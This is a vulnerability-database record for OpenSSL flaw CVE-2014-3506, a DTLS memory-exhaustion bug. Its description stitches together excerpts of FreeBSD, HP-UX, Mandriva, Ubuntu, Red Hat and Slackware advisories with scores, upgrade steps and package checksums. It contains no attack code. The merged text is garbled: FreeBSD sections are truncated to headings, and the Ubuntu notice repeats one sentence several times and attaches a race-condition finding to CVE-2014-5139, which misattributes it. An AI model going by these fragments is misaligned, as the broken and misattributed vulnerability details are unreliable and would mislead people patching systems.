"NONE", "exploitabilityScore": 10.0, "impactScore": 2.9, "integrityImpact": "NONE", "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "trust": 1.0, "userInteractionRequired": false, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "Low", "accessVector": "Network", "authentication": "None", "author": "NVD", "availabilityImpact": "Partial", "baseScore": 5.0, "confidentialityImpact": "None", "exploitabilityScore": null, "id": "CVE-2014-3506", "impactScore": null, "integrityImpact": "None", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "Medium", "trust": 0.9, "userInteractionRequired": null, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "NVD", "id": "CVE-2014-3506", "trust": 1.8, "value": "MEDIUM" }, { "author": "CNNVD", "id": "CNNVD-201408-128", "trust": 0.6, "value": "MEDIUM" }, { "author": "VULMON", "id": "CVE-2014-3506", "trust": 0.1, "value": "MEDIUM" } ] } ], "sources": [ { "db": "VULMON", "id": "CVE-2014-3506" }, { "db": "JVNDB", "id": "JVNDB-2014-003810" }, { "db": "CNNVD", "id": "CNNVD-201408-128" }, { "db": "NVD", "id": "CVE-2014-3506" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "d1_both.c in the DTLS implementation in OpenSSL 0.9.8 before 0.9.8zb, 1.0.0 before 1.0.0n, and 1.0.1 before 1.0.1i allows remote attackers to cause a denial of service (memory consumption) via crafted DTLS handshake messages that trigger memory allocations corresponding to large length values. OpenSSL is prone to a denial-of-service vulnerability. \nAttackers may exploit this issue to consume large amounts of memory, resulting in a denial-of-service condition. \nThe following versions are vulnerable:\nOpenSSL 0.9.8 versions prior to 0.9.8zb. \nOpenSSL 1.0.0 versions prior to 1.0.0n. \nOpenSSL 1.0.1 versions prior to 1.0.1i. \n - The SSLv3 vulnerability known as \"Padding Oracle on Downgraded Legacy\nEncryption\" also known as \"Poodle\", which could be exploited remotely\nresulting in disclosure of information. \nCorrected: 2014-08-07 21:04:42 UTC (stable/10, 10.0-STABLE)\n 2014-09-09 10:09:46 UTC (releng/10.0, 10.0-RELEASE-p8)\n 2014-08-07 21:06:34 UTC (stable/9, 9.3-STABLE)\n 2014-09-09 10:13:46 UTC (releng/9.3, 9.3-RELEASE-p1)\n 2014-09-09 10:13:46 UTC (releng/9.2, 9.2-RELEASE-p11)\n 2014-09-09 10:13:46 UTC (releng/9.1, 9.1-RELEASE-p18)\n 2014-08-07 21:06:34 UTC (stable/8, 8.4-STABLE)\n 2014-09-09 10:13:46 UTC (releng/8.4, 8.4-RELEASE-p15)\nCVE Name: CVE-2014-3506, CVE-2014-3507, CVE-2014-3508, CVE-2014-3510,\n CVE-2014-3509, CVE-2014-3511, CVE-2014-3512, CVE-2014-5139\n\nFor general information regarding FreeBSD Security Advisories,\nincluding descriptions of the fields above, security branches, and the\nfollowing sections, please visit \u003cURL:http://security.FreeBSD.org/\u003e. Background\n\nFreeBSD includes software from the OpenSSL Project. \n\nII. [CVE-2014-5139]\n\nIII. Additionally, a remote attacker may be able\nto run arbitrary code on a vulnerable system if the application has been\nset up for SRP. \n\nIV. Workaround\n\nNo workaround is available. \n\nV. Solution\n\nPerform one of the following:\n\n1) Upgrade your vulnerable system to a supported FreeBSD stable or\nrelease / security branch (releng) dated after the correction date. \n\n2) To update your vulnerable system via a source code patch:\n\nThe following patches have been verified to apply to the applicable\nFreeBSD release branches. \n\na) Download the relevant patch from the location below, and verify the\ndetached PGP signature using your PGP utility. \n\n[FreeBSD 10.0]\n# fetch http://security.FreeBSD.org/patches/SA-14:18/openssl-10.0.patch\n# fetch http://security.FreeBSD.org/patches/SA-14:18/openssl-10.0.patch.asc\n# gpg --verify openssl-10.0.patch.asc\n\n[FreeBSD 9.3]\n# fetch http://security.FreeBSD.org/patches/SA-14:18/openssl-9.3.patch\n# fetch http://security.FreeBSD.org/patches/SA-14:18/openssl-9.3.patch.asc\n# gpg --verify openssl-9.3.patch.asc\n\n[FreeBSD 9.2, 9.1, 8.4]\n# fetch http://security.FreeBSD.org/patches/SA-14:18/openssl-9.patch\n# fetch http://security.FreeBSD.org/patches/SA-14:18/openssl-9.patch.asc\n# gpg --verify openssl-9.patch.asc\n\nb) Apply the patch. Execute the following commands as root:\n\n# cd /usr/src\n# patch \u003c /path/to/patch\n\nc) Recompile the operating system using buildworld and installworld as\ndescribed in \u003cURL:http://www.FreeBSD.org/handbook/makeworld.html\u003e. \n\nRestart all deamons using the library, or reboot the system. \n\n3) To update your vulnerable system via a binary patch:\n\nSystems running a RELEASE version of FreeBSD on the i386 or amd64\nplatforms can be updated via the freebsd-update(8) utility:\n\n# freebsd-update fetch\n# freebsd-update install\n\nVI. Correction details\n\nThe following list contains the correction revision numbers for each\naffected branch. \n\nBranch/path Revision\n- -------------------------------------------------------------------------\nstable/8/ r269687\nreleng/8.4/ r271305\nstable/9/ r269687\nreleng/9.1/ r271305\nreleng/9.2/ r271305\nreleng/9.3/ r271305\nstable/10/ r269686\nreleng/10.0/ r271304\n- -------------------------------------------------------------------------\n\nTo see which files were modified by a particular revision, run the\nfollowing command, replacing NNNNNN with the revision number, on a\nmachine with Subversion installed:\n\n# svn diff -cNNNNNN --summarize svn://svn.freebsd.org/base\n\nOr visit the following URL, replacing NNNNNN with the revision number:\n\n\u003cURL:http://svnweb.freebsd.org/base?view=revision\u0026revision=NNNNNN\u003e\n\nVII. \n\nDetailed descriptions of the vulnerabilities can be found at:\nhttps://www.openssl.org/news/secadv_20140806.txt\n\nIt\u0027s important that you upgrade the libssl1.0.0 package and not just\nthe openssl package. Alternatively, you may reboot your system. \n\nFor the testing distribution (jessie), these problems will be fixed\nsoon. \n\nRelease Date: 2014-08-14\nLast Updated: 2014-08-14\n\nPotential Security Impact: Remote Denial of Service (DoS), unauthorized\naccess. \n\nSource: Hewlett-Packard Company, HP Software Security Response Team\n\nVULNERABILITY SUMMARY\nPotential security vulnerabilities have been identified with HP-UX running\nOpenSSL. These vulnerabilities could be exploited remotely to create a Denial\nof Service (DoS), allow unauthorized access. \nHP-UX B.11.11, B.11.23, B.11.31 running OpenSSL versions before 0.9.8zb\n\nBACKGROUND\n\nCVSS 2.0 Base Metrics\n===========================================================\n Reference Base Vector Base Score\nCVE-2014-3505 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2014-3506 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2014-3507 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2014-3508 (AV:N/AC:M/Au:N/C:P/I:N/A:N) 4.3\nCVE-2014-3510 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3\n===========================================================\n Information on CVSS is documented\n in HP Customer Notice: HPSN-2008-002\n\nRESOLUTION\n\nHP has provided the following updates to resolve these vulnerabilities. The\nupdates are available from https://h20392.www2.hp.com/portal/swdepot/displayP\nroductInfo.do?productNumber=OPENSSL11I\n\nHP-UX Release\n HP-UX OpenSSL version\n\nB.11.11 (11i v1)\n OpenSSL_A.00.09.08zb.001_HP-UX_B.11.11_32_64.depot\n\nB.11.23 (11i v2)\n OpenSSL_A.00.09.08zb.002_HP-UX_B.11.23_IA-PA.depot\n\nB.11.31 (11i v3)\n OpenSSL_A.00.09.08zb.003_HP-UX_B.11.31_IA-PA.depot\n\nMANUAL ACTIONS: Yes - Update\n\nInstall OpenSSL A.00.09.08zb or subsequent\n\nPRODUCT SPECIFIC INFORMATION\n\nHP-UX Software Assistant: HP-UX Software Assistant is an enhanced application\nthat replaces HP-UX Security Patch Check. It analyzes all Security Bulletins\nissued by HP and lists recommended actions that may apply to a specific HP-UX\nsystem. It can also download patches and create a depot automatically. For\nmore information see: https://www.hp.com/go/swa\n\nThe following text is for use by the HP-UX Software Assistant. \n\nAFFECTED VERSIONS\n\nHP-UX B.11.11\n==================\nopenssl.OPENSSL-CER\nopenssl.OPENSSL-CONF\nopenssl.OPENSSL-DOC\nopenssl.OPENSSL-INC\nopenssl.OPENSSL-LIB\nopenssl.OPENSSL-MAN\nopenssl.OPENSSL-MIS\nopenssl.OPENSSL-PRNG\nopenssl.OPENSSL-PVT\nopenssl.OPENSSL-RUN\nopenssl.OPENSSL-SRC\naction: install revision A.00.09.08zb.001 or subsequent\n\nHP-UX B.11.23\n==================\nopenssl.OPENSSL-CER\nopenssl.OPENSSL-CONF\nopenssl.OPENSSL-DOC\nopenssl.OPENSSL-INC\nopenssl.OPENSSL-LIB\nopenssl.OPENSSL-MAN\nopenssl.OPENSSL-MIS\nopenssl.OPENSSL-PRNG\nopenssl.OPENSSL-PVT\nopenssl.OPENSSL-RUN\nopenssl.OPENSSL-SRC\naction: install revision A.00.09.08zb.002 or subsequent\n\nHP-UX B.11.31\n==================\nopenssl.OPENSSL-CER\nopenssl.OPENSSL-CONF\nopenssl.OPENSSL-DOC\nopenssl.OPENSSL-INC\nopenssl.OPENSSL-LIB\nopenssl.OPENSSL-MAN\nopenssl.OPENSSL-MIS\nopenssl.OPENSSL-PRNG\nopenssl.OPENSSL-PVT\nopenssl.OPENSSL-RUN\nopenssl.OPENSSL-SRC\naction: install revision A.00.09.08zb.003 or subsequent\n\nEND AFFECTED VERSIONS\n\nHISTORY\nVersion:1 (rev.1) - 15 August 2014 Initial release\n\nThird Party Security Patches: Third party security patches that are to be\ninstalled on systems running HP software products should be applied in\naccordance with the customer\u0027s patch management policy. \n\nSupport: For issues about implementing the recommendations of this Security\nBulletin, contact normal HP Services support channel. For other issues about\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com. \n\nReport: To report a potential security vulnerability with any HP supported\nproduct, send Email to: security-alert@hp.com\n\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\nalerts via Email:\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\n\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\navailable here:\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\n\nSoftware Product Category: The Software Product Category is represented in\nthe title by the two characters following HPSB. \n\n3C = 3COM\n3P = 3rd Party Software\nGN = HP General Software\nHF = HP Hardware and Firmware\nMP = MPE/iX\nMU = Multi-Platform Software\nNS = NonStop Servers\nOV = OpenVMS\nPI = Printing and Imaging\nPV = ProCurve\nST = Storage Software\nTU = Tru64 UNIX\nUX = HP-UX\n\nCopyright 2014 Hewlett-Packard Development Company, L.P. \nHewlett-Packard Company shall not be liable for technical or editorial errors\nor omissions contained herein. The information provided is provided \"as is\"\nwithout warranty of any kind. To the extent permitted by law, neither HP or\nits affiliates, subcontractors or suppliers will be liable for\nincidental,special or consequential damages including downtime cost; lost\nprofits; damages relating to the procurement of substitute products or\nservices; or damages for loss of data, or software restoration. The\ninformation in this document is subject to change without notice. \nHewlett-Packard Company and the names of Hewlett-Packard products referenced\nherein are trademarks of Hewlett-Packard Company in the United States and\nother countries. Other product and company names mentioned herein may be\ntrademarks of their respective owners. \n \n The updated packages have been upgraded to the 1.0.0n version where\n these security flaws has been fixed. \n _______________________________________________________________________\n\n References:\n\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3508\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3509\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3505\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3506\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3507\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3510\n http://www.openssl.org/news/secadv_20140806.txt\n _______________________________________________________________________\n\n Updated Packages:\n\n Mandriva Business Server 1/X86_64:\n 17007f558e739eb863c8507d520ffbc9 mbs1/x86_64/lib64openssl1.0.0-1.0.0n-1.mbs1.x86_64.rpm\n f810bbe20b2de26cb99d13ddaf0ac2fa mbs1/x86_64/lib64openssl-devel-1.0.0n-1.mbs1.x86_64.rpm\n 54d87a61ca0440dc5f344931de1ff43e mbs1/x86_64/lib64openssl-engines1.0.0-1.0.0n-1.mbs1.x86_64.rpm\n 5b1748370e5a855cc31d3eec7673da5e mbs1/x86_64/lib64openssl-static-devel-1.0.0n-1.mbs1.x86_64.rpm\n 7e19a555629b4a2d3d4533be7786ce5e mbs1/x86_64/openssl-1.0.0n-1.mbs1.x86_64.rpm \n a9e74f2bab2878f601cfb44620c76dbb mbs1/SRPMS/openssl-1.0.0n-1.mbs1.src.rpm\n _______________________________________________________________________\n\n To upgrade automatically use MandrivaUpdate or urpmi. The verification\n of md5 checksums and GPG signatures is performed automatically for you. \n\n All packages are signed by Mandriva for security. You can obtain the\n GPG public key of the Mandriva Security Team by executing:\n\n gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98\n\n You can view other update advisories for Mandriva Linux at:\n\n http://www.mandriva.com/en/support/security/advisories/\n\n If you want to report vulnerabilities, please contact\n\n security_(at)_mandriva.com\n _______________________________________________________________________\n\n Type Bits/KeyID Date User ID\n pub 1024D/22458A98 2000-07-10 Mandriva Security Team\n \u003csecurity*mandriva.com\u003e\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.12 (GNU/Linux)\n\niD8DBQFT5HsDmqjQ0CJFipgRAhA5AJ0ZoDe2+SA7K7xk+NZLedQBVoFVvgCffPW9\n5geoq7aMnxbnw5eTuuH+iIs=\n=CK7e\n-----END PGP SIGNATURE-----\n. ============================================================================\nUbuntu Security Notice USN-2308-1\nAugust 07, 2014\n\nopenssl vulnerabilities\n============================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 14.04 LTS\n- Ubuntu 12.04 LTS\n- Ubuntu 10.04 LTS\n\nSummary:\n\nSeveral security issues were fixed in OpenSSL. This issue\nonly affected Ubuntu 12.04 LTS and Ubuntu 14.04 LTS. When OpenSSL is used with certain\napplications, an attacker may use this issue to possibly gain access to\nsensitive information. (CVE-2014-3508)\n\nGabor Tyukasz discovered that OpenSSL contained a race condition when\nprocessing serverhello messages. This issue\nonly affected Ubuntu 12.04 LTS and Ubuntu 14.04 LTS. This issue only affected Ubuntu 12.04 LTS\nand Ubuntu 14.04 LTS. This issue only affected Ubuntu 12.04 LTS and Ubuntu 14.04 LTS. This issue only affected Ubuntu 12.04 LTS and\nUbuntu 14.04 LTS. (CVE-2014-5139)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 14.04 LTS:\n libssl1.0.0 1.0.1f-1ubuntu2.5\n\nUbuntu 12.04 LTS:\n libssl1.0.0 1.0.1-4ubuntu5.17\n\nUbuntu 10.04 LTS:\n libssl0.9.8 0.9.8k-7ubuntu8.20\n\nAfter a standard system update you need to reboot your computer to make\nall the necessary changes. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n=====================================================================\n Red Hat Security Advisory\n\nSynopsis: Moderate: openssl security update\nAdvisory ID: RHSA-2014:1053-01\nProduct: Red Hat Enterprise Linux\nAdvisory URL: https://rhn.redhat.com/errata/RHSA-2014-1053.html\nIssue date: 2014-08-13\nCVE Names: CVE-2014-0221 CVE-2014-3505 CVE-2014-3506 \n CVE-2014-3508 CVE-2014-3510 \n=====================================================================\n\n1. Summary:\n\nUpdated openssl packages that fix multiple security issues are now\navailable for Red Hat Enterprise Linux 5. \n\nRed Hat Product Security has rated this update as having Moderate security\nimpact. Common Vulnerability Scoring System (CVSS) base scores, which give\ndetailed severity ratings, are available for each vulnerability from the\nCVE links in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux (v. 5 server) - i386, ia64, ppc, s390x, x86_64\nRed Hat Enterprise Linux Desktop (v. 5 client) - i386, x86_64\nRed Hat Enterprise Linux Desktop Workstation (v. 5 client) - i386, x86_64\n\n3. Description:\n\nOpenSSL is a toolkit that implements the Secure Sockets Layer (SSL),\nTransport Layer Security (TLS), and Datagram Transport Layer Security\n(DTLS) protocols, as well as a full-strength, general purpose cryptography\nlibrary. \n\nIt was discovered that the OBJ_obj2txt() function could fail to properly\nNUL-terminate its output. This could possibly cause an application using\nOpenSSL functions to format fields of X.509 certificates to disclose\nportions of its memory. (CVE-2014-3508)\n\nMultiple flaws were discovered in the way OpenSSL handled DTLS packets. (CVE-2014-0221,\nCVE-2014-3505, CVE-2014-3506)\n\nA NULL pointer dereference flaw was found in the way OpenSSL performed a\nhandshake when using the anonymous Diffie-Hellman (DH) key exchange. (CVE-2014-3510)\n\nRed Hat would like to thank the OpenSSL project for reporting\nCVE-2014-0221. Upstream acknowledges Imre Rad of Search-Lab as the original\nreporter of this issue. \n\nAll OpenSSL users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. For the update to take\neffect, all services linked to the OpenSSL library (such as httpd and other\nSSL-enabled services) must be restarted or the system rebooted. \n\n4. Solution:\n\nBefore applying this update, make sure all previously released errata\nrelevant to your system have been applied. \n\nThis update is available via the Red Hat Network. Details on how to use the\nRed Hat Network to apply this update are available at\nhttps://access.redhat.com/articles/11258\n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1103593 - CVE-2014-0221 openssl: DoS when sending invalid DTLS handshake\n1127490 - CVE-2014-3508 openssl: information leak in pretty printing functions\n1127499 - CVE-2014-3505 openssl: DTLS packet processing double free\n1127500 - CVE-2014-3506 openssl: DTLS memory exhaustion\n1127503 - CVE-2014-3510 openssl: DTLS anonymous (EC)DH denial of service\n\n6. Package List:\n\nRed Hat Enterprise Linux Desktop (v. 5 client):\n\nSource:\nopenssl-0.9.8e-27.el5_10.4.src.rpm\n\ni386:\nopenssl-0.9.8e-27.el5_10.4.i386.rpm\nopenssl-0.9.8e-27.el5_10.4.i686.rpm\nopenssl-debuginfo-0.9.8e-27.el5_10.4.i386.rpm\nopenssl-debuginfo-0.9.8e-27.el5_10.4.i686.rpm\nopenssl-perl-0.9.8e-27.el5_10.4.i386.rpm\n\nx86_64:\nopenssl-0.9.8e-27.el5_10.4.i686.rpm\nopenssl-0.9.8e-27.el5_10.4.x86_64.rpm\nopenssl-debuginfo-0.9.8e-27.el5_10.4.i686.rpm\nopenssl-debuginfo-0.9.8e-27.el5_10.4.x86_64.rpm\nopenssl-perl-0.9.8e-27.el5_10.4.x86_64.rpm\n\nRed Hat Enterprise Linux Desktop Workstation (v. 5 client):\n\nSource:\nopenssl-0.9.8e-27.el5_10.4.src.rpm\n\ni386:\nopenssl-debuginfo-0.9.8e-27.el5_10.4.i386.rpm\nopenssl-devel-0.9.8e-27.el5_10.4.i386.rpm\n\nx86_64:\nopenssl-debuginfo-0.9.8e-27.el5_10.4.i386.rpm\nopenssl-debuginfo-0.9.8e-27.el5_10.4.x86_64.rpm\nopenssl-devel-0.9.8e-27.el5_10.4.i386.rpm\nopenssl-devel-0.9.8e-27.el5_10.4.x86_64.rpm\n\nRed Hat Enterprise Linux (v. 5 server):\n\nSource:\nopenssl-0.9.8e-27.el5_10.4.src.rpm\n\ni386:\nopenssl-0.9.8e-27.el5_10.4.i386.rpm\nopenssl-0.9.8e-27.el5_10.4.i686.rpm\nopenssl-debuginfo-0.9.8e-27.el5_10.4.i386.rpm\nopenssl-debuginfo-0.9.8e-27.el5_10.4.i686.rpm\nopenssl-devel-0.9.8e-27.el5_10.4.i386.rpm\nopenssl-perl-0.9.8e-27.el5_10.4.i386.rpm\n\nia64:\nopenssl-0.9.8e-27.el5_10.4.i686.rpm\nopenssl-0.9.8e-27.el5_10.4.ia64.rpm\nopenssl-debuginfo-0.9.8e-27.el5_10.4.i686.rpm\nopenssl-debuginfo-0.9.8e-27.el5_10.4.ia64.rpm\nopenssl-devel-0.9.8e-27.el5_10.4.ia64.rpm\nopenssl-perl-0.9.8e-27.el5_10.4.ia64.rpm\n\nppc:\nopenssl-0.9.8e-27.el5_10.4.ppc.rpm\nopenssl-0.9.8e-27.el5_10.4.ppc64.rpm\nopenssl-debuginfo-0.9.8e-27.el5_10.4.ppc.rpm\nopenssl-debuginfo-0.9.8e-27.el5_10.4.ppc64.rpm\nopenssl-devel-0.9.8e-27.el5_10.4.ppc.rpm\nopenssl-devel-0.9.8e-27.el5_10.4.ppc64.rpm\nopenssl-perl-0.9.8e-27.el5_10.4.ppc.rpm\n\ns390x:\nopenssl-0.9.8e-27.el5_10.4.s390.rpm\nopenssl-0.9.8e-27.el5_10.4.s390x.rpm\nopenssl-debuginfo-0.9.8e-27.el5_10.4.s390.rpm\nopenssl-debuginfo-0.9.8e-27.el5_10.4.s390x.rpm\nopenssl-devel-0.9.8e-27.el5_10.4.s390.rpm\nopenssl-devel-0.9.8e-27.el5_10.4.s390x.rpm\nopenssl-perl-0.9.8e-27.el5_10.4.s390x.rpm\n\nx86_64:\nopenssl-0.9.8e-27.el5_10.4.i686.rpm\nopenssl-0.9.8e-27.el5_10.4.x86_64.rpm\nopenssl-debuginfo-0.9.8e-27.el5_10.4.i386.rpm\nopenssl-debuginfo-0.9.8e-27.el5_10.4.i686.rpm\nopenssl-debuginfo-0.9.8e-27.el5_10.4.x86_64.rpm\nopenssl-devel-0.9.8e-27.el5_10.4.i386.rpm\nopenssl-devel-0.9.8e-27.el5_10.4.x86_64.rpm\nopenssl-perl-0.9.8e-27.el5_10.4.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/#package\n\n7. References:\n\nhttps://www.redhat.com/security/data/cve/CVE-2014-0221.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-3505.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-3506.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-3508.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-3510.html\nhttps://access.redhat.com/security/updates/classification/#moderate\nhttps://www.openssl.org/news/secadv_20140605.txt\nhttps://www.openssl.org/news/secadv_20140806.txt\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2014 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niD8DBQFT69sGXlSAg2UNWIIRAuZjAJ9R5VuNKxbsx8+T/WGZrkH1VheAqgCdHHXN\nvrHSSMIJuncazkJWPE/LOyQ=\n=/f7Y\n-----END PGP SIGNATURE-----\n\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n. Description:\n\nRed Hat JBoss Web Server is a fully integrated and certified set of\ncomponents for hosting Java web applications. It is comprised of the Apache\nHTTP Server, the Apache Tomcat Servlet container, Apache Tomcat Connector\n(mod_jk), JBoss HTTP Connector (mod_cluster), Hibernate, and the Tomcat\nNative library. Solution:\n\nThe References section of this erratum contains a download link (you must\nlog in to download the update). \n\n\nHere are the details from the Slackware 14.1 ChangeLog:\n+--------------------------+\npatches/packages/openssl-1.0.1i-i486-1_slack14.1.txz: Upgraded. \n (* Security fix *)\n+--------------------------+\n\n\nWhere to find the new packages:\n+-----------------------------+\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you. \n\nUpdated packages for Slackware 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/openssl-0.9.8zb-i486-1_slack13.0.txz\nftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/openssl-solibs-0.9.8zb-i486-1_slack13.0.txz\n\nUpdated packages for Slackware x86_64 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/openssl-0.9.8zb-x86_64-1_slack13.0.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/openssl-solibs-0.9.8zb-x86_64-1_slack13.0.txz\n\nUpdated packages for Slackware 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/openssl-0.9.8zb-i486-1_slack13.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/openssl-solibs-0.9.8zb-i486-1_slack13.1.txz\n\nUpdated packages for Slackware x86_64 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/openssl-0.9.8zb-x86_64-1_slack13.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/openssl-solibs-0.9.8zb-x86_64-1_slack13.1.txz\n\nUpdated packages for Slackware 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/openssl-0.9.8zb-i486-1_slack13.37.txz\nftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/openssl-solibs-0.9.8zb-i486-1_slack13.37.txz\n\nUpdated packages for Slackware x86_64 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/openssl-0.9.8zb-x86_64-1_slack13.37.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/openssl-solibs-0.9.8zb-x86_64-1_slack13.37.txz\n\nUpdated packages for Slackware 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/openssl-1.0.1i-i486-1_slack14.0.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/openssl-solibs-1.0.1i-i486-1_slack14.0.txz\n\nUpdated packages for Slackware x86_64 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/openssl-1.0.1i-x86_64-1_slack14.0.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/openssl-solibs-1.0.1i-x86_64-1_slack14.0.txz\n\nUpdated packages for Slackware 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/openssl-1.0.1i-i486-1_slack14.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/openssl-solibs-1.0.1i-i486-1_slack14.1.txz\n\nUpdated packages for Slackware x86_64 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/openssl-1.0.1i-x86_64-1_slack14.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/openssl-solibs-1.0.1i-x86_64-1_slack14.1.txz\n\nUpdated packages for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/a/openssl-solibs-1.0.1i-i486-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/openssl-1.0.1i-i486-1.txz\n\nUpdated packages for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/a/openssl-solibs-1.0.1i-x86_64-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/openssl-1.0.1i-x86_64-1.txz\n\n\nMD5 signatures:\n+-------------+\n\nSlackware 13.0 packages:\n30bdc015b10d8891b90d3f6ea34f5fdd openssl-0.9.8zb-i486-1_slack13.0.txz\n3dc4140c22c04c94e5e74386a5a1c200 openssl-solibs-0.9.8zb-i486-1_slack13.0.txz\n\nSlackware x86_64 13.0 packages:\n3da32f51273762d67bf9dbcc91af9413 openssl-0.9.8zb-x86_64-1_slack13.0.txz\n075e5d12e5b909ecac923cb210f83544 openssl-solibs-0.9.8zb-x86_64-1_slack13.0.txz\n\nSlackware 13.1 packages:\n3b7e2bb2b317bf72b8f9b2b7a14bddfb openssl-0.9.8zb-i486-1_slack13.1.txz\n92af0784eade0674332a56bfab73b97d openssl-solibs-0.9.8zb-i486-1_slack13.1.txz\n\nSlackware x86_64 13.1 packages:\ndf5f961109d7b50971660ca6a7d4c48c openssl-0.9.8zb-x86_64-1_slack13.1.txz\n582aaeae3d56730a2e1538a67d4e44da openssl-solibs-0.9.8zb-x86_64-1_slack13.1.txz\n\nSlackware 13.37 packages:\n546445d56d3b367fa0dd4e80859c4620 openssl-0.9.8zb-i486-1_slack13.37.txz\nb80e9df8cdd0649939ec2fab20d24691 openssl-solibs-0.9.8zb-i486-1_slack13.37.txz\n\nSlackware x86_64 13.37 packages:\n9c9ce97dc21340924a3e27c1a8047023 openssl-0.9.8zb-x86_64-1_slack13.37.txz\n0fe1931f2fc82fb8d5fbe72680caf843 openssl-solibs-0.9.8zb-x86_64-1_slack13.37.txz\n\nSlackware 14.0 packages:\nd1580f4b22b99cee42b22276653c8180 openssl-1.0.1i-i486-1_slack14.0.txz\nec93cec2bcab8ae7391a504573cbc231 openssl-solibs-1.0.1i-i486-1_slack14.0.txz\n\nSlackware x86_64 14.0 packages:\n329475de3759225b1d02aa7317b2eb58 openssl-1.0.1i-x86_64-1_slack14.0.txz\n25f2a198022d974534986a3913ca705c openssl-solibs-1.0.1i-x86_64-1_slack14.0.txz\n\nSlackware 14.1 packages:\n8336457bc31d44ebf502ffc4443f12f7 openssl-1.0.1i-i486-1_slack14.1.txz\n4b99ac357fbd3065c53367eea246b8c7 openssl-solibs-1.0.1i-i486-1_slack14.1.txz\n\nSlackware x86_64 14.1 packages:\nf2b8f81d9d7dc02e5d1011f663ccc95d openssl-1.0.1i-x86_64-1_slack14.1.txz\n4360abffbb57cb18ba0720f782d78250 openssl-solibs-1.0.1i-x86_64-1_slack14.1.txz\n\nSlackware -current packages:\n49ecd332a899cf742d3467a6efe44269 a/openssl-solibs-1.0.1i-i486-1.txz\n27da017c49045981b1793f105aff365f n/openssl-1.0.1i-i486-1.txz\n\nSlackware x86_64 -current packages:\n8d74f3d770802182137c84d925f58cbc 